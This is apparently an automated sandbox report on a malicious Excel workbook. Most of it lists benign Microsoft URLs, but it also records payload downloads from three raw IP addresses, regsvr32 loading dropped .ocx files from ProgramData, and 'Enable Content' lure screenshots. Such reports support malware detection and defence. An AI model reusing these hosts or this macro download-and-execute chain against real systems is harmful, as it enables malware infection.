    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://invites.office.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://login.windows.local
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://management.azure.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://management.azure.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://messaging.office.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://officeapps.live.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://onedrive.live.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://osi.office.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://otelrules.azureedge.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office365.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://roaming.edog.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://settings.outlook.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://tasks.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive

    System Summary

    barindex
    Source: Screenshot number: 8Screenshot OCR: Enable Editing ) PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 8Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 0Screenshot OCR: Enable Content CD SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content Oj If you are using
    Source: Screenshot number: 12Screenshot OCR: Enable Editing O ) PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unles
    Source: Screenshot number: 12Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-133608431-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: 27522436.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocx
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocxJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{4BF17B60-6849-4930-B940-7B8721B9131C} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@7/5@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings7.bin
    Source: Summary-133608431-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: 27522436.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Scripting
    1
    DLL Side-Loading
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    File and Directory Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
    Non-Application Layer Protocol
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts22
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory2
    System Information Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Process Injection
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
    Scripting
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://roaming.edog.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
    https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://api.aadrm.com0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    http://185.252.215.41/4864943733141980.dat100%Avira URL Cloudmalware
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    http://185.141.26.236/4864943733141980.dat100%Avira URL Cloudmalware
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    http://188.165.62.32/4864943733141980.dat0%Avira URL Cloudsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://185.252.215.41/4864943733141980.dattrue
    • Avira URL Cloud: malware
    unknown
    http://185.141.26.236/4864943733141980.dattrue
    • Avira URL Cloud: malware
    unknown
    http://188.165.62.32/4864943733141980.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
      high
